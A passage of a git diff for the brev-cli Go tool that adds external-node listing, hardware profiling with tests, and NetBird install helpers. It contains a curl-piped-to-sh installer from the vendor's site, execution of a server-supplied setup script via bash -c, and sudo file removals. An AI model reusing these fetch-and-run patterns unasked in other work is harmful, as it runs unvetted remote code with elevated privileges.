}, + } + + svc := &fakeNodeService{ + grantSSHFn: func(_ *nodev1.GrantNodeSSHAccessRequest) (*nodev1.GrantNodeSSHAccessResponse, error) { + return nil, connect.NewError(connect.CodeInternal, nil) + }, + } + + deps, server := testGrantSSHDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runGrantSSH(context.Background(), term, store, deps) + if err == nil { + t.Fatal("expected error when GrantNodeSSHAccess fails") + } +} + +func Test_runGrantSSH_NoOtherMembers(t *testing.T) { + pubKey := "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAITestKey3 test@brev" + installTestAuthorizedKey(t, pubKey) + defer cleanupSSHKey(t, pubKey) + + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockGrantSSHStore{ + user: &entity.User{ID: "user_1", PublicKey: pubKey}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + attachments: []entity.OrgRoleAttachment{ + {Subject: "user_1"}, // only current user, no others + }, + users: map[string]*entity.User{}, + } + + svc := &fakeNodeService{} + deps, server := testGrantSSHDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runGrantSSH(context.Background(), term, store, deps) + if err == nil { + t.Fatal("expected error when no other members exist") + } +} diff --git a/pkg/cmd/ls/ls.go b/pkg/cmd/ls/ls.go index da95aa89b..47c4e743c 100644 --- a/pkg/cmd/ls/ls.go +++ b/pkg/cmd/ls/ls.go @@ -2,14 +2,19 @@ package ls import ( + "context" "encoding/json" "fmt" "os" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + "github.com/brevdev/brev-cli/pkg/analytics" "github.com/brevdev/brev-cli/pkg/cmd/cmderrors" "github.com/brevdev/brev-cli/pkg/cmd/completions" "github.com/brevdev/brev-cli/pkg/cmd/hello" + "github.com/brevdev/brev-cli/pkg/cmd/register" cmdutil "github.com/brevdev/brev-cli/pkg/cmd/util" "github.com/brevdev/brev-cli/pkg/cmdcontext" "github.com/brevdev/brev-cli/pkg/config" @@ -32,6 +37,7 @@ type LsStore interface { GetUsers(queryParams map[string]string) ([]entity.User, error) GetWorkspace(workspaceID string) (*entity.Workspace, error) GetOrganizations(options *store.GetOrganizationsOptions) ([]entity.Organization, error) + GetAccessToken() (string, error) hello.HelloStore } @@ -99,7 +105,7 @@ with other commands like stop, start, or delete.`, return nil }, Args: cmderrors.TransformToValidationError(cobra.MinimumNArgs(0)), - ValidArgs: []string{"orgs", "workspaces"}, + ValidArgs: []string{"orgs", "workspaces", "nodes"}, RunE: func(cmd *cobra.Command, args []string) error { err := RunLs(t, loginLsStore, args, org, showAll, jsonOutput) if err != nil { @@ -226,6 +232,12 @@ func handleLsArg(ls *Ls, arg string, user *entity.User, org *entity.Organization return breverrors.WrapAndTrace(err) } return nil + } else if util.IsSingularOrPlural(arg, "node") { + err := ls.RunNodes(org) + if err != nil { + return breverrors.WrapAndTrace(err) + } + return nil } return nil } @@ -234,13 +246,19 @@ type Ls struct { lsStore LsStore terminal *terminal.Terminal jsonOutput bool + piped bool } func NewLs(lsStore LsStore, terminal *terminal.Terminal, jsonOutput bool) *Ls { + piped := false + if fi, err := os.Stdout.Stat(); err == nil { + piped = fi.Mode()&os.ModeCharDevice == 0 + } return &Ls{ lsStore: lsStore, terminal: terminal, jsonOutput: jsonOutput, + piped: piped, } } @@ -422,6 +440,10 @@ func (ls Ls) RunWorkspaces(org *entity.Organization, user *entity.User, showAll } else { ls.ShowUserWorkspaces(org, orgs, user, allWorkspaces) } + + // Also show external nodes in the default listing + ls.showNodesSection(org) + return nil } @@ -624,3 +646,123 @@ func getStatusColoredText(t *terminal.Terminal, status string) string { return status } } + +// NodeInfo represents external node data for JSON output. +type NodeInfo struct { + Name string `json:"name"` + ExternalNodeID string `json:"external_node_id"` + DeviceID string `json:"device_id"` + OrgID string `json:"org_id"` + Status string `json:"status"` +} + +func (ls Ls) listNodes(org *entity.Organization) ([]*nodev1.ExternalNode, error) { + client := register.NewNodeServiceClient(ls.lsStore, config.GlobalConfig.GetBrevPublicAPIURL()) + resp, err := client.ListNodes(context.Background(), connect.NewRequest(&nodev1.ListNodesRequest{ + OrganizationId: org.ID, + })) + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + return resp.Msg.GetItems(), nil +} + +// RunNodes lists external nodes for the given org. +func (ls Ls) RunNodes(org *entity.Organization) error { + nodes, err := ls.listNodes(org) + if err != nil { + return breverrors.WrapAndTrace(err) + } + + if len(nodes) == 0 { + if ls.jsonOutput { + fmt.Println("[]") + return nil + } + if ls.piped { + return nil + } + ls.terminal.Vprint(ls.terminal.Yellow("No external nodes in this org.")) + return nil + } + + if ls.jsonOutput { + return ls.outputNodesJSON(nodes) + } + if ls.piped { + displayNodesTablePlain(nodes) + return nil + } + + ls.terminal.Vprintf("\nYou have %d external node(s) in Org %s\n", len(nodes), ls.terminal.Yellow(org.Name)) + displayNodesTable(ls.terminal, nodes) + return nil +} + +// showNodesSection appends external nodes to the default `brev ls` output. +// Errors are silently ignored so that a ListNodes failure doesn't break the +// workspace listing. +func (ls Ls) showNodesSection(org *entity.Organization) { + nodes, err := ls.listNodes(org) + if err != nil || len(nodes) == 0 { + return + } + + if ls.jsonOutput || ls.piped { + // JSON and piped modes are already handled per-section; skip here to + // avoid duplicating output when the user runs `brev ls nodes` explicitly. + return + } + + ls.terminal.Vprintf("\nExternal Nodes (%d):\n", len(nodes)) + displayNodesTable(ls.terminal, nodes) +} + +func (ls Ls) outputNodesJSON(nodes []*nodev1.ExternalNode) error { + var infos []NodeInfo + for _, n := range nodes { + infos = append(infos, NodeInfo{ + Name: n.GetName(), + ExternalNodeID: n.GetExternalNodeId(), + DeviceID: n.GetDeviceId(), + OrgID: n.GetOrganizationId(), + Status: nodeConnectionStatus(n), + }) + } + output, err := json.MarshalIndent(infos, "", " ") + if err != nil { + return breverrors.WrapAndTrace(err) + } + fmt.Println(string(output)) + return nil +} + +func displayNodesTable(t *terminal.Terminal, nodes []*nodev1.ExternalNode) { + ta := table.NewWriter() + ta.SetOutputMirror(os.Stdout) + ta.Style().Options = getBrevTableOptions() + ta.AppendHeader(table.Row{"NAME", "NODE ID", "DEVICE ID", "STATUS"}) + for _, n := range nodes { + status := nodeConnectionStatus(n) + ta.AppendRows([]table.Row{{n.GetName(), n.GetExternalNodeId(), n.GetDeviceId(), getStatusColoredText(t, status)}}) + } + ta.Render() +} + +func displayNodesTablePlain(nodes []*nodev1.ExternalNode) { + ta := table.NewWriter() + ta.SetOutputMirror(os.Stdout) + ta.Style().Options = getBrevTableOptions() + ta.AppendHeader(table.Row{"NAME", "NODE ID", "DEVICE ID", "STATUS"}) + for _, n := range nodes { + ta.AppendRows([]table.Row{{n.GetName(), n.GetExternalNodeId(), n.GetDeviceId(), nodeConnectionStatus(n)}}) + } + ta.Render() +} + +func nodeConnectionStatus(n *nodev1.ExternalNode) string { + if ci := n.GetConnectivityInfo(); ci != nil && ci.GetRegistrationCommand() != "" { + return "REGISTERED" + } + return "UNKNOWN" +} diff --git a/pkg/cmd/register/hardware.go b/pkg/cmd/register/hardware.go new file mode 100644 index 000000000..866231bf1 --- /dev/null +++ b/pkg/cmd/register/hardware.go @@ -0,0 +1,306 @@ +package register + +import ( + "bufio" + "fmt" + "os/exec" + "runtime" + "strconv" + "strings" + + breverrors "github.com/brevdev/brev-cli/pkg/errors" +) + +// CommandRunner abstracts command execution for testability. +type CommandRunner interface { + Run(name string, args ...string) ([]byte, error) +} + +// ExecCommandRunner is the real implementation that runs OS commands. +type ExecCommandRunner struct{} + +func (r ExecCommandRunner) Run(name string, args ...string) ([]byte, error) { + out, err := exec.Command(name, args...).Output() // #nosec G204 + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + return out, nil +} + +// NodeSpec matches the proto NodeSpec message from dev-plane. +// All fields are best-effort. +type NodeSpec struct { + GPUs []NodeGPU `json:"gpus"` + RAMBytes *int64 `json:"ram_bytes,omitempty"` + CPUCount *int32 `json:"cpu_count,omitempty"` + Architecture string `json:"architecture,omitempty"` + Storage []NodeStorage `json:"storage,omitempty"` + OS string `json:"os,omitempty"` + OSVersion string `json:"os_version,omitempty"` +} + +// NodeStorage represents a single storage device with its size and type. +type NodeStorage struct { + StorageBytes int64 `json:"storage_bytes"` + StorageType string `json:"storage_type,omitempty"` // "SSD" or "HDD" +} + +// NodeGPU matches the proto NodeGPU message. +type NodeGPU struct { + Model string `json:"model"` + Count int32 `json:"count"` + MemoryBytes *int64 `json:"memory_bytes,omitempty"` +} + +// FileReader abstracts file reading for testability. +type FileReader interface { + ReadFile(path string) ([]byte, error) +} + +// CollectHardwareProfile gathers system hardware information. +// All fields are best-effort; failures are silently ignored. +func CollectHardwareProfile(runner CommandRunner, reader FileReader) (*NodeSpec, error) { + spec := &NodeSpec{ + Architecture: runtime.GOARCH, + } + + if gpus, err := parseNvidiaSMI(runner); err == nil { + spec.GPUs = gpus + } + + if cpuCount, err := parseCPUCount(reader); err == nil { + count32 := int32(cpuCount) + spec.CPUCount = &count32 + } + + if ramBytes, err := parseMemInfo(reader); err == nil { + spec.RAMBytes = &ramBytes + } + + osName, osVersion := parseOSRelease(reader) + spec.OS = osName + spec.OSVersion = osVersion + + spec.Storage = collectStorage(runner) + + return spec, nil +} + +// parseCPUCount reads /proc/cpuinfo and returns the number of logical processors. +func parseCPUCount(reader FileReader) (int, error) { + data, err := reader.ReadFile("/proc/cpuinfo") + if err != nil { + return 0, breverrors.WrapAndTrace(err) + } + return parseCPUCountContent(string(data)) +} + +// parseCPUCountContent parses the content of /proc/cpuinfo for processor count. +func parseCPUCountContent(content string) (int, error) { + count := 0 + scanner := bufio.NewScanner(strings.NewReader(content)) + for scanner.Scan() { + if strings.HasPrefix(scanner.Text(), "processor") { + count++ + } + } + if count == 0 { + return 0, fmt.Errorf("no processors found in /proc/cpuinfo") + } + return count, nil +} + +// parseMemInfo reads /proc/meminfo and returns total RAM in bytes. +func parseMemInfo(reader FileReader) (int64, error) { + data, err := reader.ReadFile("/proc/meminfo") + if err != nil { + return 0, breverrors.WrapAndTrace(err) + } + return parseMemInfoContent(string(data)) +} + +// parseMemInfoContent parses the content of /proc/meminfo. +func parseMemInfoContent(content string) (int64, error) { + scanner := bufio.NewScanner(strings.NewReader(content)) + for scanner.Scan() { + line := scanner.Text() + if strings.HasPrefix(line, "MemTotal:") { + fields := strings.Fields(line) + if len(fields) < 2 { + return 0, fmt.Errorf("unexpected MemTotal format: %s", line) + } + kb, err := strconv.ParseInt(fields[1], 10, 64) + if err != nil { + return 0, fmt.Errorf("failed to parse MemTotal value: %w", err) + } + return kb * 1024, nil // convert kB to bytes + } + } + return 0, fmt.Errorf("MemTotal not found in /proc/meminfo") +} + +// parseOSRelease reads /etc/os-release and returns (name, version). +func parseOSRelease(reader FileReader) (string, string) { + data, err := reader.ReadFile("/etc/os-release") + if err != nil { + return "", "" + } + return parseOSReleaseContent(string(data)) +} + +// parseOSReleaseContent parses the content of /etc/os-release. +func parseOSReleaseContent(content string) (string, string) { + name := "" + version := "" + scanner := bufio.NewScanner(strings.NewReader(content)) + for scanner.Scan() { + line := scanner.Text() + if val, ok := strings.CutPrefix(line, "NAME="); ok { + name = unquote(val) + } + if val, ok := strings.CutPrefix(line, "VERSION_ID="); ok { + version = unquote(val) + } + } + return name, version +} + +// unquote removes surrounding double quotes from a string. +func unquote(s string) string { + s = strings.TrimSpace(s) + if len(s) >= 2 && s[0] == '"' && s[len(s)-1] == '"' { + return s[1 : len(s)-1] + } + return s +} + +// parseNvidiaSMI queries nvidia-smi for GPU information. +// Returns an error if nvidia-smi fails or no GPUs are found. +func parseNvidiaSMI(runner CommandRunner) ([]NodeGPU, error) { + out, err := runner.Run("nvidia-smi", + "--query-gpu=name,memory.total", + "--format=csv,noheader,nounits", + ) + if err != nil { + return nil, fmt.Errorf("nvidia-smi not available: %w", err) + } + gpus := parseNvidiaSMIOutput(string(out)) + if len(gpus) == 0 { + return nil, fmt.Errorf("nvidia-smi returned no GPUs") + } + return gpus, nil +} + +// parseNvidiaSMIOutput parses nvidia-smi CSV output, grouping identical GPU +// models into a single NodeGPU with a count. +func parseNvidiaSMIOutput(output string) []NodeGPU { + type gpuKey struct { + model string + memoryBytes int64 + } + + counts := make(map[gpuKey]int32) + var order []gpuKey + + scanner := bufio.NewScanner(strings.NewReader(output)) + for scanner.Scan() { + line := strings.TrimSpace(scanner.Text()) + if line == "" { + continue + } + parts := strings.Split(line, ", ") + if len(parts) < 2 { + continue + } + model := strings.TrimSpace(parts[0]) + memMB, err := strconv.ParseInt(strings.TrimSpace(parts[1]), 10, 64) + if err != nil { + continue + } + key := gpuKey{model: model, memoryBytes: memMB * 1024 * 1024} + if counts[key] == 0 { + order = append(order, key) + } + counts[key]++ + } + + gpus := make([]NodeGPU, 0, len(order)) + for _, key := range order { + mem := key.memoryBytes + gpus = append(gpus, NodeGPU{ + Model: key.model, + Count: counts[key], + MemoryBytes: &mem, + }) + } + return gpus +} + +// collectStorage returns per-device storage entries from lsblk, +// using the ROTA column to determine device type. +func collectStorage(runner CommandRunner) []NodeStorage { + out, err := runner.Run("lsblk", "-b", "-d", "-n", "-o", "NAME,SIZE,TYPE,ROTA") + if err != nil { + return nil + } + return parseStorageOutput(string(out)) +} + +// parseStorageOutput parses lsblk output (NAME,SIZE,TYPE,ROTA columns), +// returning one NodeStorage entry per disk device. ROTA=0 → SSD, ROTA=1 → HDD. +func parseStorageOutput(output string) []NodeStorage { + var devices []NodeStorage + scanner := bufio.NewScanner(strings.NewReader(output)) + for scanner.Scan() { + fields := strings.Fields(scanner.Text()) + if len(fields) < 4 || fields[2] != "disk" { + continue + } + size, err := strconv.ParseInt(fields[1], 10, 64) + if err != nil { + continue + } + entry := NodeStorage{StorageBytes: size} + rota, err := strconv.Atoi(fields[3]) + if err == nil { + if rota == 0 { + entry.StorageType = "SSD" + } else { + entry.StorageType = "HDD" + } + } + devices = append(devices, entry) + } + return devices +} + +// FormatNodeSpec returns a human-readable summary of the hardware profile. +func FormatNodeSpec(s *NodeSpec) string { + var b strings.Builder + if s.CPUCount != nil { + _, _ = fmt.Fprintf(&b, " CPU: %d cores\n", *s.CPUCount) + } + if s.RAMBytes != nil { + _, _ = fmt.Fprintf(&b, " RAM: %.1f GB\n", float64(*s.RAMBytes)/(1024*1024*1024)) + } + for _, gpu := range s.GPUs { + if gpu.MemoryBytes != nil { + memGB := float64(*gpu.MemoryBytes) / (1024 * 1024 * 1024) + _, _ = fmt.Fprintf(&b, " GPUs: %d x %s (%.1f GB)\n", gpu.Count, gpu.Model, memGB) + } else { + _, _ = fmt.Fprintf(&b, " GPUs: %d x %s\n", gpu.Count, gpu.Model) + } + } + _, _ = fmt.Fprintf(&b, " Arch: %s\n", s.Architecture) + if s.OS != "" || s.OSVersion != "" { + _, _ = fmt.Fprintf(&b, " OS: %s %s\n", s.OS, s.OSVersion) + } + for _, st := range s.Storage { + _, _ = fmt.Fprintf(&b, " Storage: %.1f GB", float64(st.StorageBytes)/(1024*1024*1024)) + if st.StorageType != "" { + _, _ = fmt.Fprintf(&b, " (%s)", st.StorageType) + } + b.WriteString("\n") + } + return b.String() +} diff --git a/pkg/cmd/register/hardware_test.go b/pkg/cmd/register/hardware_test.go new file mode 100644 index 000000000..929c79d39 --- /dev/null +++ b/pkg/cmd/register/hardware_test.go @@ -0,0 +1,425 @@ +package register + +import ( + "strings" + "testing" +) + +func Test_parseCPUCountContent_ValidInput(t *testing.T) { + content := `processor : 0 +vendor_id : AuthenticAMD +model name : AMD EPYC 7763 64-Core Processor +cpu MHz : 2450.000 + +processor : 1 +vendor_id : AuthenticAMD +model name : AMD EPYC 7763 64-Core Processor +cpu MHz : 2450.000 + +processor : 2 +vendor_id : AuthenticAMD +model name : AMD EPYC 7763 64-Core Processor +cpu MHz : 2450.000 +` + count, err := parseCPUCountContent(content) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if count != 3 { + t.Errorf("expected 3 CPUs, got %d", count) + } +} + +func Test_parseCPUCountContent_EmptyInput(t *testing.T) { + _, err := parseCPUCountContent("") + if err == nil { + t.Fatal("expected error for empty input") + } +} + +func Test_parseMemInfoContent_ValidInput(t *testing.T) { + content := `MemTotal: 131886028 kB +MemFree: 1234567 kB +MemAvailable: 98765432 kB +` + bytes, err := parseMemInfoContent(content) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + expected := int64(131886028) * 1024 + if bytes != expected { + t.Errorf("expected %d bytes, got %d", expected, bytes) + } +} + +func Test_parseMemInfoContent_MissingMemTotal(t *testing.T) { + content := `MemFree: 1234567 kB +MemAvailable: 98765432 kB +` + _, err := parseMemInfoContent(content) + if err == nil { + t.Fatal("expected error for missing MemTotal") + } +} + +func Test_parseOSReleaseContent(t *testing.T) { + content := `NAME="Ubuntu" +VERSION="24.04 LTS (Noble Numbat)" +ID=ubuntu +VERSION_ID="24.04" +PRETTY_NAME="Ubuntu 24.04 LTS" +` + name, version := parseOSReleaseContent(content) + if name != "Ubuntu" { + t.Errorf("expected Ubuntu, got %s", name) + } + if version != "24.04" { + t.Errorf("expected 24.04, got %s", version) + } +} + +func Test_parseOSReleaseContent_Unquoted(t *testing.T) { + content := `NAME=Fedora +VERSION_ID=39 +` + name, version := parseOSReleaseContent(content) + if name != "Fedora" { + t.Errorf("expected Fedora, got %s", name) + } + if version != "39" { + t.Errorf("expected 39, got %s", version) + } +} + +func Test_parseNvidiaSMIOutput_GroupsByModel(t *testing.T) { + output := `NVIDIA GB10, 131072 +NVIDIA GB10, 131072 +` + gpus := parseNvidiaSMIOutput(output) + if len(gpus) != 1 { + t.Fatalf("expected 1 GPU group, got %d", len(gpus)) + } + if gpus[0].Model != "NVIDIA GB10" { + t.Errorf("unexpected GPU model: %s", gpus[0].Model) + } + if gpus[0].Count != 2 { + t.Errorf("expected count 2, got %d", gpus[0].Count) + } + expectedMem := int64(131072) * 1024 * 1024 + if gpus[0].MemoryBytes == nil || *gpus[0].MemoryBytes != expectedMem { + t.Errorf("expected %d bytes, got %v", expectedMem, gpus[0].MemoryBytes) + } +} + +func Test_parseNvidiaSMIOutput_MultipleModels(t *testing.T) { + output := `NVIDIA A100, 81920 +NVIDIA GB10, 131072 +NVIDIA A100, 81920 +` + gpus := parseNvidiaSMIOutput(output) + if len(gpus) != 2 { + t.Fatalf("expected 2 GPU groups, got %d", len(gpus)) + } + if gpus[0].Model != "NVIDIA A100" || gpus[0].Count != 2 { + t.Errorf("expected 2x NVIDIA A100, got %dx %s", gpus[0].Count, gpus[0].Model) + } + if gpus[1].Model != "NVIDIA GB10" || gpus[1].Count != 1 { + t.Errorf("expected 1x NVIDIA GB10, got %dx %s", gpus[1].Count, gpus[1].Model) + } +} + +func Test_parseNvidiaSMIOutput_Empty(t *testing.T) { + gpus := parseNvidiaSMIOutput("") + if len(gpus) != 0 { + t.Errorf("expected 0 GPUs, got %d", len(gpus)) + } +} + +func Test_parseStorageOutput(t *testing.T) { + output := `nvme0n1 500107862016 disk 0 +nvme1n1 1000204886016 disk 0 +sda 2048 rom 1 +` + devices := parseStorageOutput(output) + if len(devices) != 2 { + t.Fatalf("expected 2 devices, got %d", len(devices)) + } + if devices[0].StorageBytes != 500107862016 { + t.Errorf("expected 500107862016, got %d", devices[0].StorageBytes) + } + if devices[0].StorageType != "SSD" { + t.Errorf("expected SSD, got %s", devices[0].StorageType) + } + if devices[1].StorageBytes != 1000204886016 { + t.Errorf("expected 1000204886016, got %d", devices[1].StorageBytes) + } + if devices[1].StorageType != "SSD" { + t.Errorf("expected SSD, got %s", devices[1].StorageType) + } +} + +func Test_parseStorageOutput_SDA(t *testing.T) { + output := `sda 500107862016 disk 1 +` + devices := parseStorageOutput(output) + if len(devices) != 1 { + t.Fatalf("expected 1 device, got %d", len(devices)) + } + if devices[0].StorageBytes != 500107862016 { + t.Errorf("expected 500107862016 bytes, got %d", devices[0].StorageBytes) + } + if devices[0].StorageType != "HDD" { + t.Errorf("expected HDD, got %s", devices[0].StorageType) + } +} + +func Test_unquote(t *testing.T) { + tests := []struct { + input string + want string + }{ + {`"Ubuntu"`, "Ubuntu"}, + {`Ubuntu`, "Ubuntu"}, + {`""`, ""}, + {`"a"`, "a"}, + {``, ""}, + } + for _, tt := range tests { + got := unquote(tt.input) + if got != tt.want { + t.Errorf("unquote(%q) = %q, want %q", tt.input, got, tt.want) + } + } +} + +func Test_FormatNodeSpec(t *testing.T) { + cpuCount := int32(12) + ramBytes := int64(137438953472) // 128 GB + memBytes := int64(137438953472) // 128 GB + s := &NodeSpec{ + CPUCount: &cpuCount, + RAMBytes: &ramBytes, + Architecture: "arm64", + OS: "Ubuntu", + OSVersion: "24.04", + GPUs: []NodeGPU{ + {Model: "NVIDIA GB10", Count: 1, MemoryBytes: &memBytes}, + }, + } + output := FormatNodeSpec(s) + if output == "" { + t.Fatal("expected non-empty output") + } + if !strings.Contains(output, "12 cores") { + t.Errorf("expected CPU info in output: %s", output) + } + if !strings.Contains(output, "128.0 GB") { + t.Errorf("expected RAM info in output: %s", output) + } + if !strings.Contains(output, "NVIDIA GB10") { + t.Errorf("expected GPU info in output: %s", output) + } +} + +func Test_FormatNodeSpec_MinimalFields(t *testing.T) { + s := &NodeSpec{ + GPUs: []NodeGPU{ + {Model: "NVIDIA GB10", Count: 1}, + }, + Architecture: "arm64", + } + output := FormatNodeSpec(s) + if strings.Contains(output, "CPU:") { + t.Errorf("should not contain CPU when nil: %s", output) + } + if strings.Contains(output, "RAM:") { + t.Errorf("should not contain RAM when nil: %s", output) + } + if !strings.Contains(output, "NVIDIA GB10") { + t.Errorf("expected GPU info: %s", output) + } + if !strings.Contains(output, "arm64") { + t.Errorf("expected arch info: %s", output) + } +} + +func Test_FormatNodeSpec_WithStorage(t *testing.T) { + s := &NodeSpec{ + Architecture: "amd64", + Storage: []NodeStorage{ + {StorageBytes: 500107862016, StorageType: "SSD"}, + {StorageBytes: 1000204886016, StorageType: "HDD"}, + }, + } + output := FormatNodeSpec(s) + if !strings.Contains(output, "Storage:") { + t.Errorf("expected storage in output: %s", output) + } + if !strings.Contains(output, "SSD") { + t.Errorf("expected SSD in output: %s", output) + } + if !strings.Contains(output, "HDD") { + t.Errorf("expected HDD in output: %s", output) + } +} + +func Test_parseNvidiaSMIOutput_MalformedLines(t *testing.T) { + output := ` +malformed line +NVIDIA GB10, 131072 +, , +just-a-name +NVIDIA A100, not-a-number +` + gpus := parseNvidiaSMIOutput(output) + if len(gpus) != 1 { + t.Fatalf("expected 1 valid GPU, got %d", len(gpus)) + } + if gpus[0].Model != "NVIDIA GB10" { + t.Errorf("unexpected model: %s", gpus[0].Model) + } +} + +func Test_parseStorageOutput_Empty(t *testing.T) { + devices := parseStorageOutput("") + if len(devices) != 0 { + t.Errorf("expected 0 devices, got %d", len(devices)) + } +} + +func Test_parseStorageOutput_NoDiskDevices(t *testing.T) { + output := `sr0 1073741312 rom 1 +loop0 123456 loop 0 +` + devices := parseStorageOutput(output) + if len(devices) != 0 { + t.Errorf("expected 0 devices for non-disk entries, got %d", len(devices)) + } +} + +// mockCommandRunner for testing CollectHardwareProfile +type mockCommandRunner struct { + outputs map[string][]byte + errors map[string]error +} + +func (m *mockCommandRunner) Run(name string, args ...string) ([]byte, error) { + key := name + if err, ok := m.errors[key]; ok { + return nil, err + } + if out, ok := m.outputs[key]; ok { + return out, nil + } + return nil, nil +} + +type mockFileReader struct { + files map[string][]byte +} + +func (m *mockFileReader) ReadFile(path string) ([]byte, error) { + if data, ok := m.files[path]; ok { + return data, nil + } + return nil, &mockFileNotFoundError{path: path} +} + +type mockFileNotFoundError struct{ path string } + +func (e *mockFileNotFoundError) Error() string { return "file not found: " + e.path } + +func Test_CollectHardwareProfile_WithMocks(t *testing.T) { + runner := &mockCommandRunner{ + outputs: map[string][]byte{ + "nvidia-smi": []byte("NVIDIA GB10, 131072\nNVIDIA GB10, 131072\n"), + "lsblk": []byte("nvme0n1 500107862016 disk 0\n"), + }, + } + reader := &mockFileReader{ + files: map[string][]byte{ + "/proc/cpuinfo": []byte("processor\t: 0\nprocessor\t: 1\n"), + "/proc/meminfo": []byte("MemTotal: 131886028 kB\n"), + "/etc/os-release": []byte("NAME=\"Ubuntu\"\nVERSION_ID=\"24.04\"\n"), + }, + } + + spec, err := CollectHardwareProfile(runner, reader) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if len(spec.GPUs) != 1 || spec.GPUs[0].Count != 2 { + t.Errorf("expected 1 GPU group with count 2, got %v", spec.GPUs) + } + if spec.CPUCount == nil || *spec.CPUCount != 2 { + t.Errorf("expected 2 CPUs, got %v", spec.CPUCount) + } + if spec.RAMBytes == nil || *spec.RAMBytes != 131886028*1024 { + t.Errorf("unexpected RAM: %v", spec.RAMBytes) + } + if spec.OS != "Ubuntu" || spec.OSVersion != "24.04" { + t.Errorf("unexpected OS: %s %s", spec.OS, spec.OSVersion) + } + if len(spec.Storage) != 1 || spec.Storage[0].StorageBytes != 500107862016 { + t.Errorf("unexpected storage: %v", spec.Storage) + } + if spec.Storage[0].StorageType != "SSD" { + t.Errorf("expected SSD, got %s", spec.Storage[0].StorageType) + } +} + +func Test_CollectHardwareProfile_GPUBestEffort(t *testing.T) { + runner := &mockCommandRunner{ + errors: map[string]error{ + "nvidia-smi": &mockFileNotFoundError{path: "nvidia-smi"}, + }, + } + reader := &mockFileReader{ + files: map[string][]byte{ + "/proc/cpuinfo": []byte("processor\t: 0\n"), + "/proc/meminfo": []byte("MemTotal: 131886028 kB\n"), + }, + } + + spec, err := CollectHardwareProfile(runner, reader) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if len(spec.GPUs) != 0 { + t.Errorf("expected 0 GPUs when nvidia-smi fails, got %d", len(spec.GPUs)) + } + if spec.CPUCount == nil || *spec.CPUCount != 1 { + t.Errorf("expected 1 CPU, got %v", spec.CPUCount) + } +} + +func Test_CollectHardwareProfile_OptionalFieldsMissing(t *testing.T) { + runner := &mockCommandRunner{ + outputs: map[string][]byte{ + "nvidia-smi": []byte("NVIDIA GB10, 131072\n"), + }, + errors: map[string]error{ + "lsblk": &mockFileNotFoundError{path: "lsblk"}, + }, + } + reader := &mockFileReader{ + files: map[string][]byte{}, + } + + spec, err := CollectHardwareProfile(runner, reader) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if spec.CPUCount != nil { + t.Errorf("expected nil CPUCount when /proc/cpuinfo missing") + } + if spec.RAMBytes != nil { + t.Errorf("expected nil RAMBytes when /proc/meminfo missing") + } + if len(spec.Storage) != 0 { + t.Errorf("expected empty Storage when lsblk fails, got %v", spec.Storage) + } + if len(spec.GPUs) != 1 { + t.Errorf("expected 1 GPU, got %d", len(spec.GPUs)) + } +} diff --git a/pkg/cmd/register/netbird.go b/pkg/cmd/register/netbird.go new file mode 100644 index 000000000..ad7652d37 --- /dev/null +++ b/pkg/cmd/register/netbird.go @@ -0,0 +1,72 @@ +package register + +import ( + "fmt" + "os" + "os/exec" +) + +// InstallNetbird installs NetBird if it is not already present. +func InstallNetbird() error { + if _, err := exec.LookPath("netbird"); err == nil { + return nil + } + + script := `(curl -fsSL https://pkgs.netbird.io/install.sh | sh) || (curl -fsSL https://pkgs.netbird.io/install.sh | sh -s -- --update)` + + cmd := exec.Command("bash", "-c", script) // #nosec G204 + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + + if err := cmd.Run(); err != nil { + return fmt.Errorf("failed to install NetBird: %w", err) + } + return nil +} + +// runSetupCommand executes the setup command returned by the AddNode RPC. +func runSetupCommand(script string) error { + cmd := exec.Command("bash", "-c", script) // #nosec G204 + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + if err := cmd.Run(); err != nil { + return fmt.Errorf("setup command failed: %w", err) + } + return nil +} + +// UninstallNetbird stops, uninstalls the service, and removes the NetBird +// package or binary. It reads /etc/netbird/install.conf (written by the +// install script) to determine the original installation method. +// The down/stop steps are best-effort since the service may already be +// disconnected or stopped after deregistration. +func UninstallNetbird() error { + script := ` +sudo netbird down 2>/dev/null +sudo netbird service stop 2>/dev/null +sudo netbird service uninstall 2>/dev/null + +PKG_MGR="bin" +if [ -f /etc/netbird/install.conf ]; then + PKG_MGR=$(grep -oP '(?<=package_manager=)\S+' /etc/netbird/install.conf 2>/dev/null || echo "bin") +fi + +case "$PKG_MGR" in + apt) sudo apt-get remove -y netbird ;; + dnf) sudo dnf remove -y netbird ;; + yum) sudo yum remove -y netbird ;; + *) sudo rm -f /usr/bin/netbird /usr/local/bin/netbird ;; +esac + +sudo rm -rf /etc/netbird +` + + cmd := exec.Command("bash", "-c", script) // #nosec G204 + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + + if err := cmd.Run(); err != nil { + return fmt.Errorf("failed to uninstall NetBird: %w", err) + } + return nil +} diff --git a/pkg/cmd/register/providers.go b/pkg/cmd/register/providers.go new file mode 100644 index 000000000..5d0c8d059 --- /dev/null +++ b/pkg/cmd/register/providers.go @@ -0,0 +1,50 @@ +package register + +import ( + "runtime" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + + "github.com/brevdev/brev-cli/pkg/terminal" +) + +// LinuxPlatform reports compatibility based on whether the OS is Linux. +type LinuxPlatform struct{} + +func (LinuxPlatform) IsCompatible() bool { return runtime.GOOS == "linux" } + +// TerminalPrompter wraps terminal.PromptSelectInput for interactive prompts. +type TerminalPrompter struct{} + +func (TerminalPrompter) ConfirmYesNo(label string) bool { + result := 